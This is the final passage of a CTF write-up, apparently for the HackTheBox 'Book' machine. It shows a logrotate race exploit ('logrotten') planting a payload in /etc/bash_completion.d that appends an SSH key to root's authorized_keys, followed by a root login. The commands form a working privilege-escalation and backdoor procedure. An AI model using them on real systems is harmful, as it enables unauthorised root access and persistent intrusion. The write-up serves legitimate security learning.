<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reader@book:/tmp/.hg8$ cat payload</span><br><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">/bin/<span class="built_in">echo</span> <span class="string">"ssh-rsa Axxxxx hg8@htb.htb"</span> &gt;&gt; /root/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>Next step is to run the exploit with our payload and the log file to watch for:</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reader@book:/tmp/.hg8$ ./logrotten -p /tmp/.hg8/payload /home/reader/backups/access.log</span><br><span class="line">Waiting <span class="keyword">for</span> rotating /home/reader/backups/access.log...</span><br><span class="line">Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d</span><br><span class="line">Waiting 1 seconds before writing payload...</span><br></pre></td></tr></table></figure>

<p>Let’s append content to our log file to trigger the log rotation:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reader@book:/$ <span class="built_in">echo</span> <span class="string">"test"</span> &gt; backup/access.log</span><br></pre></td></tr></table></figure>

<p>Our payload should now have been written to <code>/etc/bash_completion.d</code>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">reader@book:~$ cat /etc/bash_completion.d/access.log</span><br><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">/bin/<span class="built_in">echo</span> <span class="string">"ssh-rsa Axxxxx hg8@htb.htb"</span> &gt;&gt; /root/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>

<p>After waiting a little we should be able to be able to connect to the <code>root</code> account trough SSH:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$  ssh -i id_rsa_htb root@book.htb</span><br><span class="line">Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)</span><br><span class="line"></span><br><span class="line">Last login: Sun Apr  5 11:03:02 2020 from ::1</span><br><span class="line">root@book:~<span class="comment"># id</span></span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br><span class="line">root@book:~<span class="comment"># cat root.txt</span></span><br><span class="line">8xxxxxxxxxxxxxxxxxxxxxx4</span><br></pre></td></tr></table></figure>

<hr>
<p>As always do not hesitate to contact me for any questions or feedbacks.</p>
<p>See you next time !</p>
<p>-hg8</p>

  </div>
</article>
<br>
<br>


    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a> › <a class="category-link" href="/categories/CTF/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/CTF/HackTheBox/Medium-Box/">Medium Box</a>
    </div>



    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CVE-2019-1014/" rel="tag">CVE-2019-1014</a>, <a class="tag-link-link" href="/tags/LFI/" rel="tag">LFI</a>, <a class="tag-link-link" href="/tags/PDF/" rel="tag">PDF</a>, <a class="tag-link-link" href="/tags/XXS/" rel="tag">XXS</a>, <a class="tag-link-link" href="/tags/book/" rel="tag">book</a>, <a class="tag-link-link" href="/tags/linux/" rel="tag">linux</a>, <a class="tag-link-link" href="/tags/logrotate/" rel="tag">logrotate</a>, <a class="tag-link-link" href="/tags/logrotten/" rel="tag">logrotten</a>, <a class="tag-link-link" href="/tags/truncation/" rel="tag">truncation</a>
    </div>





        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-Flag"><span class="toc-number">1.</span> <span class="toc-text">User Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Abusing-MySQL-truncation"><span class="toc-number">1.2.</span> <span class="toc-text">Abusing MySQL truncation</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS-in-Dynamic-PDF-Generation"><span class="toc-number">1.3.</span> <span class="toc-text">XSS in Dynamic PDF Generation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root"><span class="toc-number">2.</span> <span class="toc-text">Root</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Logrotate-exploit"><span class="toc-number">2.2.</span> <span class="toc-text">Logrotate exploit</span></a></li></ol></li></ol>
    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022
    <a href="https://hg8.sh">hg8.sh</a>
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


    
<script src="/lib/jquery/jquery.min.js"></script>


<script src="/js/main.js"></script>




</body>
</html>
